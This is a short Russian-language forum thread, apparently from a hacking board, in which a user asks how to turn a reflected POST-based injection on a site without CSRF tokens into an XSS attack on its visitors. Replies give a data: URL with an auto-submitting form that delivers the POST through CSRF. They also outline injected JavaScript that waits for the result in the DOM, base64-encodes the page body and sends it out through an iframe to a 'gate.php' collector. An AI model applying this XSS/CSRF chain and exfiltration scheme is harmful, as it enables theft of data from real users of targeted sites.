Имеется форма запроса по адресу - domen.com/info/ При нажатии на кнопку, идет POST запрос domen.com/ajax?action=getInfo На domen.com/info/ выводится полученная информация из запроса, в той же странице. При отправке JS в POST запросе, код успешно внедряется в domen.com/info/ Токенов нету. Задача: Реализовать XSS атаку на пользователя находящегося на domen.com/info/ Проблема: Не разберусь как отправить POST запрос, чтобы он вывелся в рамках той же страницы. Это возможно?
Code: data:text/html,<form action=http://site.com/ method=post><input name="param1" value="value1"> <input type="submit" id="a"></form><script>document.getElementById('a').click()</script> Это в браузер, т.е. задействуя csrf это можно сделать.
попробуйте внедрить свой .js код на страницу domen.com/info а в нем как вариант через setInterval(цикл) чекать вхождение DOM элемента (который появляется только при post запросе), появился - пакуем DOM тело страницы и шлем. Под понятием шлем - iframe src="gate.php?data=base64encode_dom_body"
